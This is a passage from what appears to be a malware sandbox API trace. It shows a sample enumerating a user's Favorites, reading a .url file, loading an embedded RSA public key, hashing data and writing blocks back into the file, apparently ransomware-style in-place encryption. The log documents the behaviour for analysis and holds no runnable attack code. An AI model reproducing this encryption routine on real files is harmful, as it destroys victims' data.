ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0237.737] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.737] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.737] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0237.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0237.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.738] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.738] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.738] PathFindFileNameW (pszPath="") returned="" [0237.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.739] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.739] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0237.739] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0237.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.739] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.739] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.742] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.742] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.743] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.743] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.744] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.744] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.744] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.744] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.744] GetLastError () returned 0x0 [0237.744] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.744] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.744] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.744] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.744] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.744] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409440 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409488 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400770 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.745] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400770 | out: hHeap=0x620000) returned 1 [0237.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400770 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400728 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400710 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400770 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.746] GetCurrentThreadId () returned 0x5b4 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b828b8 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.746] GetCurrentThreadId () returned 0x5b4 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400770 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400728 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400788 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400758 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400740 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007a0 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400740 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400758 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400710 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400770 | out: hHeap=0x620000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007a0 | out: hHeap=0x620000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400788 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409488 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.750] WriteFile (in: hFile=0x644, lpBuffer=0x64e690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x64e690*, lpNumberOfBytesWritten=0x39afb14*=0x80, lpOverlapped=0x0) returned 1 [0237.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.751] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.751] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, 